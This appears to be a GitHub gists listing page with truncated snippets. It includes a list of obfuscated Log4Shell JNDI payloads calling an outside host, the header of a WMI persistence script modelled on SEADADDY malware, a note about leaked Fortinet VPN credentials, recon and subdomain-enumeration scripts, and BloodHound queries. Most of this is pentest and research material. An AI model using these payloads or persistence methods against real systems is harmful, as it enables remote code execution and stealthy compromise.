This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
qemu-img convert -O raw source.vhd output.raw |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
' | |
' SYNOPSIS: | |
' WMI Persistence method as originally presented by SEADADDY malware | |
' (https://github.com/pan-unit42/iocs/blob/master/seaduke/decompiled.py#L887) | |
' and further documented by Matt Graeber. | |
' | |
' The scheduled command will be launched after roughly 3 minutes since system | |
' gets up. Also, even if the command shall spawn a window - it will not be visible, | |
' since the command will get invoked by WmiPrvSE.exe that's running in Session 0. | |
' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
${jndi:ldap://127.0.0.1:1389/ badClassName} | |
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://l4j.zsec.uk/sploit} | |
${${::-j}ndi:rmi://l4j.zsec.uk/sploit} | |
${jndi:rmi://l4j.zsec.uk} | |
${${lower:jndi}:${lower:rmi}://l4j.zsec.uk/sploit} | |
${${lower:${lower:jndi}}:${lower:rmi}://l4j.zsec.uk/sploit} | |
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://l4j.zsec.uk/sploit} | |
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://l4j.zsec.uk/sploit} | |
${${upper:jndi}:${upper:rmi}://l4j.zsec.uk/sploit} | |
${${upper:j}${upper:n}${lower:d}i:${upper:rmi}://l4j.zsec.uk/sploit} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
share = true | |
#mode = passive | |
mode = active | |
#output_directory = amass | |
scripts_directory = /home/khan/scripts | |
maximum_dns_queries = 10000 | |
[resolvers] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
##### COURTESY OF LOVELY INTELLIGENCE RESEARCHERS | |
# @CuratedIntel | |
# https://curatedintel.org | |
##### BACKGROUND | |
# Initally shared on RAMP ransomware forum | |
# Last shared on Groove ransomware extortion website | |
# Publicized by Bleeping Computer, which lead to this post being issued to help blue teamers | |
# https://www.bleepingcomputer.com/news/security/hackers-leak-passwords-for-500-000-fortinet-vpn-accounts/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# Web Application Pentest | |
clear | |
echo "[!] Don't Run It As Root Never [!]" | |
sleep 2 | |
mkdir ~/Tools/Web-Application-Pentest | |
cd ~/Tools/Web-Application-Pentest | |
# --------------------------------- # | |
mkdir ~/Tools/Web-Application-Pentest/Domain-Finding-Enum | |
mkdir ~/Tools/Web-Application-Pentest/General-Recon |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
domain=$1 | |
resultDir=$2 | |
resultfile=$resultDir/$domain.amass.txt | |
touch $resultfile | |
echo "" >> $resultDir/log.txt | |
echo "AMASS Logs Now" >> $resultDir/log.txt | |
echo "" >> $resultDir/log.txt |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# | |
# script for subdomain enumeration using 4 of the best tools with some APIs: | |
# * findomain: https://github.com/Edu4rdSHL/findomain | |
# * SubFinder: https://github.com/projectdiscovery/subfinder | |
# * Amass: https://github.com/OWASP/Amass | |
# * AssetFinder: https://github.com/tomnomnom/assetfinder | |
# | |
# a perl version is being developed by @terminalforlife | |
# * https://github.com/terminalforlife/PerlProjects/tree/master/source/dominator |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# copied from http://www.tatome.de/bliki/doku.php?id=projects:shrinkpdf | |
if [ $# -lt 2 ] || [ $# -gt 3 ]; then | |
echo usage: shrinkpdf \<filename\> \<resolution\> \[\<output\>\] | |
exit | |
fi | |
if [ ! -e "$1" ]; then | |
echo "$1" does not exist. Exiting. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
MATCH (u:User)-[r:AdminTo|MemberOf*1..]->(c:Computer | |
RETURN u.name | |
That’ll return a list of users who have admin rights on at least one system either explicitly or through group membership | |
--------------- | |
MATCH | |
(U:User)-[r:MemberOf|:AdminTo*1..]->(C:Computer) | |
WITH | |
U.name as n, |
NewerOlder